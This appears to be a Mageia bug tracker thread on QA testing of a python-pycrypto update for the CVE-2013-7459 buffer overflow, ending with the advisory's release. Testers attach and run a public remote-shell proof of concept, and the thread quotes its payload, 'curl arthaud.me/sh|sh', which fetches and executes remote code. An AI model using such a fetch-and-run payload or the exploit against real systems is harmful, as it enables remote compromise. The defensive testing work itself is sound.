A CVE has been assigned for a security issue fixed upstream in python-pycrypto: http://openwall.com/lists/oss-security/2016/12/27/8 The upstream commit to fix the issue is linked in the message above. It sounds like it's non-trivial to backport to 2.6.1. It also sounds like a serious issue. Mageia 5 is also affected.
Whiteboard: (none) => MGA5TOO
python-pycrypto-2.6.1-6.1.mga5 python3-pycrypto-2.6.1-6.1.mga5 from python-pycrypto-2.6.1-6.1.mga5.src.rpm are in 5/core/updates_testing This is a security fix for a possible Buffer overflow ref : http://openwall.com/lists/oss-security/2016/12/27/8 https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4 https://marc.info/?l=oss-security&m=148280482630855&w=2 Cauldron is also patched rpm have it own test suite run during the build, including for this issue.
Whiteboard: MGA5TOO => (none)CVE: (none) => CVE-2013-7459Assignee: makowski.mageia => qa-bugsVersion: Cauldron => 5
URL: (none) => https://lwn.net/Vulnerabilities/710478/
Prior to testing. The most recent python-pycrypto bug: https://bugs.mageia.org/show_bug.cgi?id=11491#c0 has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random. https://marc.info/?l=oss-security&m=148280482630855&w=2 is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes: "After a few hours, I finally got a shell!"
CC: (none) => lewyssmith
Created attachment 8841 [details] Random output test for python[3]-pycrypto From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random. $ python[3] cryptoRandom.py
Created attachment 8842 [details] POC for this bug, Python script to get a remote shell. From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only. Written for Python3; may work for earlier. Expect it to run for hours before (pre-update only) giving a shell.
Testing M5_64 BEFORE update: python-pycrypto-2.6.1-6.mga5 python3-pycrypto-2.6.1-6.mga5 $ python cryptoRandom.py [u'11ebfa07b917df5b,1643424639ad0df8', u'1c75461b81e3808f,7476bd90682ace47', u'3de101081f86ac97,514d5e1c4abb325e', u'c62efc43f35b0b0b,14799ad508334985'] $ python3 cryptoRandom.py [similar sort of O/P] AFTER update: python-pycrypto-2.6.1-6.1.mga5 python3-pycrypto-2.6.1-6.1.mga5 $ python cryptoRandom.py [similar sort of correct O/P as previously] $ python3 cryptoRandom.py [similar sort of correct O/P as previously] So the package still works although its long POC not specifically tested. From Comment 1 "rpm have it own test suite run during the build, including for this issue." OK.
Whiteboard: (none) => MGA5-64-OK
Advisory created from Comment 1, title, the references.
Whiteboard: MGA5-64-OK => MGA5-64-OK advisory
Testing on i586 virtualbox. Thanks for the upload Lewis. Before updating: $ python cryptoRandom.py [u'42364207b0dce3c2,29364e940c3c17c9', u'50a9812b90741463,3035440668d34d67', u'e8bfa75fdf36ad24,d2678147321a44a6', u'f2480379ff1dddac,64aba216bbe90636'] $ python3 cryptoRandom.py ['050e5d799b3ab7c8,26529743331d7995', '1d1bfaea7011db37,63d5549433c22325', '86c19227a42ef910,88527138e99cfe25', 'a5a45316ae36ed16,9197abb3d58ed85b'] Running 'python getShell.py' fails on a syntax error. Noting that the original was written for python3 I tried $ python3 getShell.py The systax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure: curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused'))) I wonder if the address targeted needs to be changed to something accessible. No clue really. $ dig 136.243.194.56 did not provide any useful information. $ nslookup 136.243.194.56 Server: 192.168.1.1 Address: 192.168.1.1#53 Non-authoritative answer: 56.194.243.136.in-addr.arpa name = ip-136-243-194-56.bb.netbynets.de. Maybe a German broadband provider? Worth trying after the update though.
CC: (none) => tarazed25
After the update the functionality test worked fine as before, with python and python3. The PoC test with python3 behaved just as before with a final "Connection refused". Should the attempt to get a remote shell have been thwarted immediately if the fix had worked? I defer to a higher authority.
Also tried this: $ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA" curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused
(In reply to Len Lawrence from comment #8) > After the update the functionality test worked fine as before, with python > and python3. so you can validate > The PoC test with python3 behaved just as before with a final "Connection > refused". > Should the attempt to get a remote shell have been thwarted immediately if > the > fix had worked? I defer to a higher authority. the security issue is tested during the rpm build.
CC: (none) => makowski.mageia
Tanks Philippe. letting it go then.
Keywords: (none) => validated_updateWhiteboard: MGA5-64-OK advisory => MGA5-64-OK MGA5-32-OK advisoryCC: (none) => sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. http://advisories.mageia.org/MGASA-2017-0032.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED